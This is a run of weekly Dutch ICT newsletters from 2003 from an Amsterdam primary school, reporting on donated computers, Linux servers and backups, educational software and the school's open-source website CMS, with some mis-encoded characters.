We hebben 't druk gehad om onze oude netwerkfunctionaliteiten te herkrijgen. Ruud en Peter hebben daartoe ook een keer op school service verleend. Soms ontdekken we zaken die nog steeds niet goed werken. Helaas is dit het gevolg van het werken met twee systemen (dirklan en schoollan) en we moeten er gewoon even mee (leren) leven.
Ondertussen hebben evaluatieve gesprekken plaats gevonden met Jaap (ASCII) en Peter (sinds kort bij SchoolLAN betrokken). Beiden waren aanwezig bij de installatie. Dirk heeft met de ICT Academies gesproken die hier op de stoep stonden om de installatie te bewonderen. Al met al gaan we er allemaal nog steeds voor!

groeten,
Karin
Dirk

2003-05-23 w21

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker week 21 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

COMPUTERS

Een van onze donateurs heeft ruim 30 computers geschonken. Van deze gemeentelijke dienst ontvingen wij Pentium 400 desktops. Met wat aanpassingen (geheugen en geluidskaart erbij gekocht) hebben we voor de nieuwe verdieping uitstekende, snelle computers (128 MB Ram). Weer heel erg bedankt! We zijn in één klap van een hele hoop problemen af.
Dit is misschien ook het moment om even te zeggen dat dit soort computers uitstekend bruikbaar zijn in het basisonderwijs. Ze zijn ook vaak in partijen te koop voor prijzen waar je van achterover slaat als je gewend bent om voor je Pentium 4 met 2 GHZ processor, 256 Ram en een veel te grote harde schijf 600 Euro neer te leggen.

AFDELING ONDERWIJS STADSDEEL DE BAARSJES

Deze week werd het ICT-beleidsplan doorgenomen met een medewerkster van ons schoolbestuur. Het plan is nog niet volledig. Daarom is er op 16 juni een vervolgafspraak waarop de omissies aangevuld moeten zijn. Daarna zullen we pas volledige beschikking krijgen over het door de overheid  sinds 1999 verstrekte ICT budget.

WERKSTUKKEN

De meeste kinderen uit de groepen 6, 7 en 8 hebben hun werkstuk bijna af. Deze week heeft een aantal leerlingen geleerd hoe een plaatje binnen de tekst kan worden gezet (figuur>tekstomloop)

LETTERPRET/MARGEMIDDAG

Tijdens de margemiddag van afgelopen dinsdag heeft de kleuterbouw geleerd hoe de leerlingen moeten worden ingevoerd in het programma Letterpret. Ook wordt er ge븰erimenteerd met allerlei instellingen. Over drie weken wordt ge﮶entariseerd hoe het is verlopen.

PROFIEL LEERLINGZORG

We hebben 't programma draaien en merken dat het steeds trager wordt in het verwerken van gegevens naarmate er meer leerkrachten de profielen hebben ingevuld. Neem a.u.b. de tijd. Vooral het verwerken van de resultaten na het invullen van de profielen duurt lang. Maar daar hoef je niet op te wachten.

ICT SCHOLING BOVENBOUW

Ter voorbereiding op de ICT evaluatiedag op 5 juni moesten er nog wat puntjes op de i gezet worden. We hebben bekeken wat er in de leerlijn tekstverwerkingsvaardigheden nog aangepast moest worden. De leerlijn voor het zoeken op internet zou misschien in het begin geholpen zijn met oefeningen van de volgende website: http://www.isomode.nl/webpaden/webpaden.htm . Nadeel: er is geen on-line feedback.

SCHOOLLAN

Deze week (en vorige week ook) besprekingen met de Stichting SchoolLAN over hoe we verder gaan. Binnenkort meer hierover.

ONS CMS

Ons website content management systeem nadert zijn nieuwe versie. Fred is de programmacode aan het poetsen en Dirk schrijft de gebruiksaanwijzing in het Engels (dit i.v.m. de Spaanse vertaling die Stephen in Mexico gaat doen). We zijn op zoek naar mensen die de gebruiksaanwijzing in het Nederlands willen vertalen. Wil je meewerken, of ken je iemand die er wel wat tijd in wil steken, dan horen we dat graag.

MONSEIGNEUR HUYBERS

Dirk bracht een wekbezoek aan Dennis Goedbloed, ICT er op de Huybersschool. Ze stappen binnenkort af van CIAO (Computers In het Amsterdamse Onderwijs) wegens problemen en stappen over op Linux. Ze willen ook het CMS gaan gebruiken.

SCRIPTIE

De OBSRB wordt genoemd in een zeer lezenswaardige scriptie van Martin Herrman en Gertjan Zwartjes van de Technische Universiteit Eindhoven. Ze schreven een prima  verhaal over de geschiedenis en de grondslagen van de Open Source beweging en Linux. Een aanradertje. Dirk heeft een papieren exemplaar en je kunt de scriptie ook vinden op de website van de school onder: ICT: http://rosaboekdrukker.net/index.php?page=418&section=6 .

groeten,
Karin
Dirk

2003-05-30 w22

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 3(??????, Hoezo, als de kat van huis is??) - week 22
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ALS DE KAT VAN HUIS IS....

Karin is deze week met vakantie. Dus alle gelegenheid om een speciaal nummer te maken. Want, er blijft genoeg te melden op ICT gebied van de OBSRB. Deze keer zit er dus (helaas) weinig 'onderwijs' in de BIC.

RECTIFICATIE

Vorige week schreven we over Dennis Goedbloed, echter met een paar storende fouten. Ziehier de rectificatie. Hij schreeft ons: "De Bisschop Huibersschool draait al meer dan twee jaar op Linux (file- & printersharing, firewalling, webserver, mailserver). Tot volle tevredenheid overigens." Bedankt, Dennis! Onze excuses voor de onvolkomenheden.

ONS CMS

Het Site@School Team schrijft zich de blaren om de gebruiksaanwijzingen op tijd af te krijgen en de laatste onvolkomenheden uit versie 1.1 te krijgen. We hebben de release datum van versie 1.2 op eind juni gezet. We verwachten dat 't gewoon gaat lukken. Site@School zal wat bugfixes bevatten, wat verbeteringen aan modules, een Forum module (nieuw!), en een gebruiksaanwijzing in het Engels. Het blijkt een omvangrijke klus te zijn om S@S zo op te schrijven dat we alles behandelen. Door het schrijven van 't manual zie je alle mogelijkheden en merk je dat 't een behoorlijk doordacht systeem is dat eenvoudig werkt, maar toch vele mogelijkheden kent.

USB-HD

Deze kreet staat voor Universal Serial Bus - Hard Disk. En het wil zeggen dat je in je computer zomaar een harde schijf kunt stoppen, zonder de computer eerst af te hoeven zetten. En als je klaar bent, bijvoorbeeld met een bakcup maken van alle waardevolle gegeven, trek je de HD zo weer los. We wilden 't altijd al graag, omdat we backups behalve binnen de school, ook buiten de school willen bewaren. Maar we kregen 't onder Linux niet voor elkaar. Nu, groot nieuws! Een eenvoudige standaard USB-HD, die je zo bij de PC-Dokter kunt kopen voor EUR 85,-- exclusief harddisk blijkt onder Linux te werken. We kregen 'm aan de praat met RedHat 7.1. Onder RH7.3 lukt 't (nog) niet. Dit kunstje kwam tot stand door bemoeienis van Jaap van ASCII (Linux Groep in de Kinkerstraat 92). De doos van de PC-Dokter is een Q-Tec 755C usb2 cd/rw case, geschikt voor HD, CD-ROM, CD-RW, DVD-player en DVD-RW. Het ding werkt onder Windows 98, ME, 2000, XP, MAC OS 8,6, 9.0 en 10.0. Zie www.qtec.info. En dus ook onder Linux!

METERKAST

We hebben ook niet veel kunnen doen omdat de electriciens een nieuwe meterkast in het serverhok plaatsten. Het ziet er prima uit.

Groet,
Dirk

2003-06-06 w23

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 23 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

EVALUATIEDAG

Onze ICT bezigheden van het afgelopen jaar werden deze week geëvalueerd. De verschillende bouwen hebben, aangestuurd door het ABC, gewerkt aan de ICT leerlijn. We hebben alles nog eens onder de loep genomen en de plannen voor volgend jaar bekeken. De scholing zal dan meer gericht zijn op directe ondersteuning in de klassen bij de uitvoering van de leerlijn (klassenconsulten). Elke bouw heeft een ICT presentatie gemaakt die gebruikt kan worden voor de schoolgids en we hebben aan de hand van stellingen op ICT gebied een 'lagerhuis-discussie' gevoerd.

Stellingen:
- met computers op school lopen kinderen een verhoogd risico op RSI.
en
- computerspelletjes zijn schadelijk voor kinderen en moeten verbannen worden uit de school.

evaluatie5juni2003-2.jpg
Bovenbouw bereidt presentatie schoolgids voor.

evaluatie5juni2003.jpg
Presentatie door medewerkers van het ABC.

AKTIE MIJNSCHOOLWEERSCHOON

Helaas zijn we niet één van de 12 scholen die in aanmerking komt voor een grote schoonmaakbeurt. In april ontvingen we een email met daarin een oproep ons aan te melden voor de schoonmaakactie. Blijkbaar zijn er scholen nog dringender toe aan een ontstoffingsbeurt. Er hadden zich 817 scholen aangemeld. www.mijnschoolweerschoon.nl

WERKSTUKKEN

Er is weer keihard gewerkt om de werkstukken dit schooljaar af te krijgen. De werkstukken worden in kleur afgedrukt. Afwachten of het erg veel inkt kost.

KEYBOARD KLEUTERS

Eindelijk is het keyboard met speciale toetsen binnen voor de oudste kleuterklas. Wie wil weten waar we het over hebben: http://www.myboard.nl/ Voor volwassenen die even snel iets willen typen is het een vreemde gewaarwording, dat toetsenbord, maar met de vuisten laat het zich aardig bedienen; de beiaardier leert typen. De toetsen zijn erg groot. En de functietoetsen ontbreken, dus Alt F4 is niet mogelijk. Werkt dit RSI (bij kinderen) in de hand of juist niet?

LETTERPRET

Nog steeds problemen met de werking. Het heeft niets te maken met het type server waarop het ge﮳talleerd wordt. Uit heel Nederland komen berichten, dat er moeilijkheden zijn. Het heeft ermee te maken, dat Letterpret (en ook veel andere educatieve software) voor stand-alone computers is ontwikkeld en daarna met een kunstgreep is omgebouwd naar een netwerkversie. Er is iets nodig om educatieve uitgeverijen bereid te vinden om de broncode van hun programma's meer openbaar te maken zodat er meer mensen kunnen meedenken hoe het beter kan. Dus betalen voor het de educatieve kant, maar de technische kant ter discussie stellen.

SCHOOLLAN

We hebben ideeën voor een SchoolLAN LIGHT versie. Die zou minder ballast en meer eenheid moeten krijgen dan de huidige versie. SchoolLAN ziet wel wat in onze aanpak, maar de termijn waarop ze denken misschien te kunnen leveren zou voor ons wel eens te ver in de toekomst kunnen liggen.

Site@School

Van twee kanten is er deze week interesse getoond in ons content management systeem. We zijn er erg trots op, dat we aan  iets bijdragen  waarvan wordt gezegd: ?Het is erg eenvoudig te gebruiken; het is heel geschikt voor een basisschool.? Precies dus waar het voor bedoeld was. En een bovenschoolse ICT consulent voor 30 basisscholen in Apeldoorn wil S@S op 12 scholen gaan gebruiken.
De Engelse gebruiksaanwijzingen vorderen en kunnen alvast bekeken worden op Dirk's privé ³erver: http://wyxs.net/manual/ . Als je de intro wilt lezen is het URL dus: http://wyxs.net/manual/intro.htm Let op: De gebruiksaanwijzingen zijn nog niet af, dus stoor je niet aan fouten, onduidelijkheden, etc. We zoeken nog steeds vertalers. Draag bij en vertaal een hoofdstuk!

groeten,
Karin
Dirk

2003-06-13 w24

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 24 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

TEKSTVERWERKEN

Deze week is er een nog nooit eerder gezien probleem aan de orde geweest. Een leerling uit groep 8 werkte aan haar werkstuk en meldde, dat er iets vreemds was. De bovenste regel stond onder in het scherm te bibberen. Na wat testjes bleek de enter-toets vast te zitten.

FOTO'S

Elke week wordt deze nieuwsbrief op de website van onze school gezet. Vorige week zijn er ook een paar foto's van de ICT evaluatie bij geplaatst. Zie: http://rosaboekdrukker.net/index.php?section=6

GROTE KLAPPER!

Site@ School, het Content Management System dat we gebruiken beleefde deze week een grote doorbraak. Dirk en Fred bedachten en maakten een programmaatje waarmee de gebruikers van het systeem zelf online alle aanpassingen in de talige inhoud van S@S kunnen doen. Dat betekent: 1 de gebruikers kunnen heel makkelijk een versie in Bhasa-Indonesia of Urdu maken en die wereldwijd ter beschikking stellen. 2. De beheerder van 't systeem kan zijn/haar eigen talige 'look and feel' aan het systeem geven. Bijvoorbeeld: als in jouw land het niet gebruikelijk is om een leerkracht een standaard email te sturen met als aanhef:  "Geachte Mevrouw/Mijnheer", maar met  "Hallo Juf/Mees" , dan kun je dat nu als beheerder zelf heel makkelijk veranderen. Fred had het programma binnen 24 uur in elkaar zitten. Kijk er maar eens naar op http://wyxs.net/starnet/translate.php Dirk mailde het succes naar zijn contact binnen de Franse Linux Basisschool Groep, http://www.abul.org/education/abuledu/index.php3 (een soort Franse SchoolLAN) . Zij boden meteen aan het systeem te nemen en een Franse vertaling te maken. Tegelijkertijd werd Dirk uitgenodigd op "Rencontres Mondiales du Logiciel Libre" (een internationale conferentie over vrije software) in Metz, om ons CMS te demonstreren, begin juli. Dirk en Fred denken erover om te gaan en zijn zeer gelukkig met deze internationale doorbraak van ons CMS.

EXTRA HULP

Vandaag hielp Mats (zoon van Karin) met allerlei klussen: Virusscanners updaten, Internet Explorer updaten, onze lijst met computers bijwerken. Allemaal klussen die bij ons nogal eens in het vergeet hoekje terecht komen. Bedankt Mats!

USB-HARDDISK

We krijgen 'm nog steeds niet aan de praat op de server waar hij het meeste nodig is. Dirk peinst zich suf en vraagt raad in de nieuwsgroep nl.os.linux.installatie.

groeten,
Karin
Dirk

2003-06-20 w25

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 25 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

VEEL TECHNISCHE INFO ONDERAAN

FOTO'S GROEP 8

Er zijn foto's van het afscheidstoneel van groep 8. Weliswaar alleen van de generale. bekijk ze op : http://rosaboekdrukker.net/index.php?section=2&page=432 Nog steeds niet de juiste digitale camera aangeschaft!!! (wie heeft suggesties?)

LEERLINGPAGINA'S

Bij de sectie leerlingen is de rubriek : ?leerling op web?. Op die plek kunnen leerlingen een eigen pagina onderhouden. Dit jaar hebben we daar nog niet veel aandacht aan besteed, omdat het accent lag op de tekstverwerking t.b.v. een werkstuk. Maar zo langzamerhand worden er wel enkele kinderen ingewijd. Dat wordt gedaan via de chat van Messenger. Buiten schooltijd dus. Volgend jaar zal er ook tijdens de schooluren aandacht aan besteed worden. http://rosaboekdrukker.net/index.php?page=54&section=4

TYPELES

Bij Anneke in groep 6 wordt regelmatig getypt. De leerlingen vorderen langzaam maar gestaag. Het is een steeds terugkerende oefening; dat vinden ze leuk. Een aantal heeft er veel lol in. Voordeel van het (gratis) DOS programmaatje is dat het simpel is en geen uitleg behoeft. Gaan we volgend jaar het eerste OBSRB typediploma uitdelen?

TAFELTOTAAL

Het programma "Tafeltotaal" van Ambrasoft is op dit moment erg populair in groep 4. Kinderen zijn hard bezig om allerlei tafeldiploma?s te behalen. Prima programma met registratie en allerlei instellingsmogelijkheden.

LETTERPRET

Volgende week wordt in de kleutergroepen gekeken hoe het tot nu toe is gegaan met het programma. Het valt John (onze concië²&secte) op, dat er allerlei printjes uit de printer komen. Er gebeurt dus iets waar we geen zicht op hebben, nog.

VIVES

Bekijk het e-zine van VIVES. Ook kun je een gratis abonnement op het papieren tijdschrift nemen. Beslist een aanrader! http://rosaboekdrukker.net/index.php?section=6&page=434

DONATIE SERVERS

Een bevriende gemeentelijke dienst heeft 5 Compaq Proliant servers aan de school gedoneerd. Zeer bedankt voor je inspanningen, Peter!! Dat is voor onze school te veel. Als er scholen zijn die belangstelling hebben voor een server, meld je dan bij de redactie. Misschien kunnen we na de vakantie met de gelukkige scholen samen een install-party organiseren.

GEHEUGEN

We vonden ook weer een handvol computergeheugen in ons postbakje. Bedankt Peter!

ONS CMS

We zitten een week voor het uitkomen van versie 1.2. Het manual is klaar. En het vertaalprogramma werkt zo makkelijk dat we meteen een Noorse vertaling van het CMS binnen kregen. Fred en Dirk zijn apetrots. En dat mag Stadsdeel de Baarsjes, afd. Onderwijs ook zijn als oorspronkelijke subsidiegever. Dirk gaat naar Metz om 't CMS te presenteren op de 'Rencontres Mondiales des Logiciel Libre".

USB-HD

Dirk bleef maar modderen met de USB-HD die hij niet aan de praat kreeg. Ook de guru's op Internet bleven in gebreke. Maar dankzij Bas (Corantijn) is het opgelost. Dank je wel Bas, voor je scherpe blik! Dirk had de boel verkeerd aangesloten. Hij heeft een nog sterkere bril nodig . Toen dat was opgelost werkte de USB Harddisk 'out of the box'.
Waarvoor willen we USB-HD? Het maken van back-ups zonder de servers af te hoeven zetten (hot swap on the fly al het ware). Die back-ups willen we uit veiligheidsoverwegingen buiten de school kunnen bewaren. En dat alles op een eenvoudige en goedkope manier uit te voeren en te beheren. Welnu, een kind zou het nu kunnen. Ik hoor jullie denken: "Neem tape". Antwoord, kort samengevat: "Wij houden niet van tape". Lang antwoord: http://www.hightek.org/bu/white_paper.html , punt 1, 2 en 3.
 Wat feiten: De USB behuizing is van Q-TEC. Gekocht bij de PC-Dokter. Prijs: E 85,-- zonder HD. Wij hebben er een 80 GB HD in zitten. 't Ding is ook geschikt voor CD, CD/RW, DVD, etc en werkt met USB 2.0. Operating Systems: Win98, ME, 2000, XP, Mac OS 8.6, 9, 10 en LINUX (bij ons op RH7.1 en 7.2). We kunnen er ESIS dus ook mee back-uppen. Snelheid: Hij kopieert ruim 2 GB per uur. We hebben ongeveer 6 GB aan back-ups op de fileserver (veel educatieve progs.) Via scp (secure copy via ssh) kopië²¥n we de tar.gz back-up van de firewall/web/mail server naar de fileserver en vandaaruit naar de USB-HD. De fw/web/mail server is RH6.2 en heeft geen USB. Er staat ongeveer 300 MB data op.

CD WRITER

Deze week heeft Jaap van ASCII (een Linux guru) een ander probleem opgelost. We kunnen de CD-RW gebruiken in de fileserver. Goed voor lange termijn back-ups. Dank je wel Jaap!

EIGEN SOFTWARE

En omdat Jaap er toch was hebben we een indringend gesprek gehad over het (laten) ontwikkelen van software voor basisscholen. Heel verhelderend. We komen er na de zomervakantie op terug. Grote vraag op dit moment: Welk educatief programma wordt op basisscholen in Nederland het meest gebruikt? De redactie looft voor ieder beargumenteerd antwoord een UTP kabel uit of een muis, naar keuze.

groeten,
Karin
Dirk

2003-06-27 w26

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week - 26 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

GROOT TECHNISCH NIEUWS: ZIE ONDER

LETTERPRET

Deze week hebben we even bekeken hoe Letterpret (Malmberg)  tot nu toe bevalt in de kleutergroepen. Inhoudelijk: leerlingen en leerkrachten zijn heel enthousiast Organisatorisch: de oudste kleuters kunnen zelfstandig met het programma overweg. Voor de allerjongsten is het te hoog gegrepen. Die moeten eerst leren de muis te bedienen. Wat er tussen zit heeft (nog) veel begeleiding nodig. Technisch: in 3 van de 5 kleutergroepen gaat de registratie en het printen van die registratie via het netwerk prima. Op de 2 andere zijn problemen die Malmberg alleen weet op te lossen met de suggestie: probeert u alles nog eens opnieuw in te voeren.
In het laatste bulletin van ICT op School stond een aardig stukje over het gebruik door kleuters van programma's voor beginnende geletterdheid: http://rosaboekdrukker.net/index.php?section=6

DIGITALE FOTOCAMERA

Eindelijk. We hebben er één. Ook dankzij het zetje van Willem Eekhof van station-to-station. De keuze is gevallen op de Canon Powershot A60. Kwam goed uit de test van de laatste ComputerTotaal. De uitgeloofde muis en netwerkkabel zijn wel gewonnen, maar de prijs is niet opgehaald.

VAKANTIE

Wat een gedoe voor een zomervakantie: dat gesjouw en gezeul met schoolmeubilair en kastinhouden. Er moeten veel mensen verkassen, ook door de nieuwbouw. Alle computers zijn losgekoppeld. De webserver zal tijdelijk een ander plekje krijgen, want in het magazijn, dat ons eigen ICT-HOK wordt komt een hele nieuwe patch-kast tijdens de vakantie. We hebben dan 128 aansluitingen opschool. Na de vakantie zullen we verslag doen van de uitbreiding van ons computerpark.

NOG MEER SERVERS EN COMPUTERS

Van onze gulle gemeentelijk bron ontvingen we deze week nog 11 computers en twee Compaq Proliant servers. Het is maar goed, dat Dirk een kelder onder zijn huis heeft waar de apparatuur wordt aangepast voor het gebruik op school (geluidskaarten) en waar het tijdelijk kan wachten op een bestemming in het gebouw. Meld je als je school een prima server wil.

GROTE DOORBRAAK!

Fred heeft het voor elkaar gekregen: Ons CMS werkt ook onder Linux. De editor (zeg maar het tekstverwerkingsprogramma) waarmee je teksten voor webpagina's maakt, werkte tot nu toe alleen met Windows en Internet Explorer 5.5 of hoger. Door zoekacties op Internet en het vinden van 'bijna' oplossingen kreeg Fred de geest, beet zich vast en vond een editor die bruikbaar is onder Linux met Mozilla 1.3.1 of hoger. Vervolgens aangepast voor het CMS. Er zitten nog een paar kleine stekeligheden in, maar daar komt hij uit. We zijn volop aan het testen. PROFICIAT FRED! Het is een grote sprong voorwaarts.

Goede vakantie allen, groeten,
Karin
Dirk

Schooljaar 2003-2004

 1. 2003-08-15 w33
 2. 2003-08-22 w34
 3. 2003-08-29 w35
 4. 2003-09-05 w36
 5. 2003-09-12 w37
 6. 2003-09-19 w38
 7. 2003-09-26 w39
 8. 2003-10-03 w40
 9. 2003-10-10 w41
 10. 2003-10-24 w43
 11. 2003-10-31 w44
 12. 2003-11-07 w45
 13. 2003-11-14 w46
 14. 2003-11-21 w47
 15. 2003-11-28 w48
 16. 2003-12-05 w49
 17. 2003-12-12 w50
 18. 2003-12-19 w51
 19. 2003-12-26 w52
 20. 2004-01-09 w02
 21. 2004-01-16 w03
 22. 2004-01-23 w04
 23. 2004-01-30 w05
 24. 2004-02-06 w06
 25. 2004-02-13 w07
 26. 2004-02-20 w08
 27. 2004-02-27 w09
 28. 2004-03-12 w11
 29. 2004-03-19 w12
 30. 2004-03-26 w13
 31. 2004-04-02 w14
 32. 2004-04-09 w15
 33. 2004-04-16 w16
 34. 2004-04-21 w17
 35. 2004-04-23 w17
 36. 2004-05-11 w20
 37. 2004-05-23 w21
 38. 2004-05-24 w22
 39. 2004-06-05 w23
 40. 2004-06-18 w25
 41. 2004-06-25 w26
 42. 2004-07-02 w27
 43. 2004-07-09 w28

2003-08-15 w33

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 33
++++++++++++++++++++++++++++++++++++++++++++++++++++++

12aug2003.jpg

Alle computers moeten weer opnieuw worden aangesloten in deze supernieuwe patch-kast, die we hebben overgehouden aan de VERBOUWING!!!!

NIEUW SCHOOLJAAR

We zijn weer begonnen. Pfffff! De verbouwing is klaar, de verhuizing nog niet, de opening staat voor de deur, we hebben geen tijd voor een uitgebreide BIC. Daarom een korte over deze week. Volgende week een uitgebreidere BIC met informatie over ons netwerk, de nieuwe versie van S@S en alle plannen waar we nog altijd en steeds van overlopen.

'NIEUWE COMPUTERS'

De computers van de gemeentelijke dienst (33 stuks) zijn door Axel (zoon van Karin) de school ingesjouwd en aangesloten. Veel computers zijn vervangen, veel staan er op de uitbreiding op de tweede verdieping. Dirk maakte een 'image' van alle software die op die computers moet gaan draaien. Zo'n image kan in 7 minuten op een computer gezet worden. Zeer arbeidsbesparend.

PATCHKAST

Onze nieuwe patchkast met 118 aansluitingen moest opnieuw ingericht worden. (zie: hierboven )

KANTOOR

Het handenarbeidlokaal is naar de 2e verdieping verhuisd. Daardoor is er eindelijk kantoorruimte en een redelijke directieruimte beschikbaar. Kantoor wordt ingericht met computers en flatscreens (die daar prima zijn. Voor gebruik door kinderen vinden wij ze te kwetsbaar).

MEUBILAIR

Door al het geschuif met computers is weer duidelijk geworden, dat we snel op zoek moeten naar goede computertafels en in hoogte verstelbare stoelen. Het aanpassen van het meubilair aan een goede zithouding is een onderdeel van onze ICT leerlijn.

groeten,
Karin
Dirk

2003-08-22 w34

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 2 - week 34 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

21augustus2003_002.jpg

De tafel uit het Juttersdok die precies past tussen kast en muur.
kosten € 15,-

We zijn al weer volop in de race, maar er ligt nog wat oud nieuws van de vakantie. Even in 't kort:

METZ

Dirk was in Metz op een Frans congres over Open Source Software en hield er een lezing. Hier is zijn verhaal: http://siteatschool.sourceforge.net/index.php?section=9

NIEUWE SERVER

Eén van de servers die we van de gemeentelijke dienst kregen hebben we in de vakantie ingericht als onze nieuwe router, firewall, web- en mailserver. Hij is op wat kleinigheden na af. De firewall is nog niet helemaal vuurbestendig.

Tot zover het vakantienieuws.

OUD MATERIAAL

We hebben een goede bestemming gevonden voor alle computers die we na onze 'upgrade' over hebben. Twee plattelandsscholen in Noord-Nederland willen ons materiaal graag hebben Het gaat om ongeveer 30 computers, beeldschermen, patchkasten, kabels, etc.etc. We zijn blij dat ons materiaal aan zijn derde leven kan beginnen.

MAGAZIJN

We hebben nu een eigen ruimte voor de netwerkvoorzieningen op onze school. Aan de verbouwing hebben we een nieuwe patchkast overgehouden die door een technisch installatie bureau is aangelegd. Ook de netwerkbedradingen op de eerste verdieping is door hen aangelegd. Allemaal piekfijn in orde en getest onze 118 aansluitingen.

AANPASSING NETWERK

De tweede verdieping is deze week afgerond. Na nog een avond werken (bedankt Bas, voor de extra hulp, dat hadden we nodig) functioneert alles. Er moeten nog een paar beeldschermen verwisseld worden. Doen we dit weekend met sjouwhulpen.

NIEUWE COMPUTERS EN IMAGES

Op de nieuwe computers staat alle software van alle groepen die niet in een netwerk hoeft te draaien. Verder alle cliënt-programma's van software die wel op de server draait (Letterpret, Leesladder, Ik-Reken, Alles Telt, TafelTotaal, etc). Hierdoor houden we de computers snel en belasten we het netwerk niet overbodig. En het is ook bedrijfszekerder. Als het netwerk uitvalt kan er toch nog tekst verwerkt worden, zijn de Bos atlassen beschikbaar, etc. etc.

FLATSCREENS

We kochten voor de directie, het kantoor en de conciërge flatscreens bij de PC-Dokter. Daarmee is deze week ook de oplevering van het kantoor voltooid. Pfff! Zie: http://rosaboekdrukker.net/index.php?section=6&page=475

MINIMUIS

Bij de PC-Dokter, waar we de flatscreens kochten zagen we een minimuis. Bedoeld voor de laptopgebruiker, maar we proberen 'm nu bij de kleuters. Een scheetje van een muisje. Jullie horen er meer van.

COMPUTERTAFELS

We moesten eigenlijk 2 computertafels op maat hebben en besloten na ons bezoek aan de PC-Dokter even langs het Juttersdok (2e hands winkel) te gaan. Bingo! Twee tafels à €15,- per stuk. Ons ICT budget raakt niet op! (zie foto hierboven)

SITE@SCHOOL

In het rijtje van scholen die ons CMS gebruiken kan worden toegevoegd:
http://www.degroenvanprinsterer.nl/
Welkom bij de club!

KLEUTERGROEPEN

We zijn vandaag begonnen met de installatie van de nieuwe computers bij de kleuters. Hopelijk is dat begin van de volgende week rond.

LETTERPRET

Letterpret draait nu op onze fileserver en de schoollanserver is buiten gebruik.

Tot zover deze BIC. We werken ons een rotje:

21augustus2003_013.jpg

http://rosaboekdrukker.net/index.php?section=6&page=476

21augustus2003_009.jpg

de nieuwe flatscreens bij de directie

21augustus2003_010.jpg

bij de conciërge is nu ook meer ruimte op het bureau

groeten,
Karin
Dirk

2003-08-29 w35

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 2 - week 35- 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Drukke, maar leuke ICT week.

PAINT GROEP 3

Groep 3 is deze week begonnen aan het werken met Paint. Ze worden daarin geholpen door de bovenschoolse leerkracht die bij ons gestationeerd is.

OPZEGGEN KENNISNET

Scholen moeten nu beslissen of het contract met Nltree (de provider van K..net) verlengd zal worden. Wij zijn vanaf onze eerste internetaansluiting verbonden geweest met A2000/UPC/CHELLO. De kennisnetaansluiting hebben we genomen, omdat we bij A2000 aanvankelijk een datalimiet hadden. De aansluiting met Nltree/kennisnet was vaak zo wisselend van snelheid, dat we op een gegeven moment helemaal over zijn gegaan op UPC. We betalen dus nu alleen aan Nltree omdat dat contract niet voortijdig beë©®digd kan worden. We zullen als tweede verbinding op zoek gaan naar een ADSL provider. We willen niet van 1 verbinding afhankelijk zijn.

ONDERZOEK KOHNSTAMMINSTITUUT

Onderzoeksvraag i.o.v. CIAO (http://www.ciao.nl ): Welke ondersteuning gebruiken de scholen op ICT gebied en waar is behoefte aan? We hebben geweigerd eraan mee te werken. We hebben in het verleden al duidelijk te kennen gegeven niet geï®´eresseerd te zijn in Ciao, omdat er aan heel veel van onze wensen niet tegemoet gekomen kon/kan worden. Daarnaast hadden we slechte ervaringen met hun baas (rare voorstelling van zaken en was niet geï®´eresseerd in onze wensen).

OPRUIMEN SCHOOL

In september wordt het 10-jarig bestaan van de school gevierd samen met de opening van de voorschool en het nieuwe gedeelte van de school. Alles moet opgeruimd worden. Op ICT gebied moet ook veel geruimd worden. Alle apparatuur die deze weken vervangen is, wordt doorgeschoven naar een andere school en is tijdelijk in de kelder bij Dirk opgeslagen.

MUIZEN EN KOPTELEFOONS

Er zijn nieuwe muizen en koptelefoons aangeschaft.

WEBSITE UP TO DATE HOUDEN

Ook wordt er hard gewerkt om nieuwe informatie op de website te zetten. De leerlingen worden in hun nieuwe groep geplaatst. Oud nieuws is zoveel mogelijk verwijderd. We staan altijd open voor op- en aanmerkingen betreffende de website.

SANERING BIBLIOTHEEK

Binnenkort wordt een begin gemaakt met het saneren van ons boekenbestand. Het programma EDUCAT-b, dat al door de kleuterbouw gebruikt wordt, zal dan ook voor de rest van de bibliotheek gebruikt gaan worden. Het wordt door Dirk op de fileserver gezet. Bij de sanering zullen we gebruik maken van de expertise van de OME (onderwijs mediatheekdienst)

KEYBOARD

Voor de kleuterbouw is een extra keyboard van het type MYBOARD (http://www.myboard.nl/) binnengekomen. Deze keer duurde het drie dagen en geen drie maanden voor het binnenkwam. De bedoeling is, dat dit keyboard gaat rouleren in de kleuterbouw om uit te vinden hoe het bevalt in 't gebruik door de jongere kinderen. Voor volwassenen is 't een ramp. Het toetsenbord van de beiaardier.

NASCHOLING

Deze week is een start gemaakt met de voorbereidingen voor de voortgang van onze ICT leerlijn. In samenwerking met het ABC werken we aan een aanpak die voor andere scholen als voorbeeld dient.

Site@School IN 'T CHINEES

Deze week kwam er een vraag in ons S@S forum van iemand uit China. Deze man heeft S@S in het Chinees vertaald. Wat een markt!! kijk!!!!

STAGIAIRE TUE

Binnenkort zal een student van de Technische Universiteit van Eindhoven zijn stage aan de Rosa Boekdrukker beginnen. Hij zal aan enkele modules van S@S gaan werken. Meer informatie hierover volgt in volgende nieuwsbrieven.

NIEUWE COMPUTERS

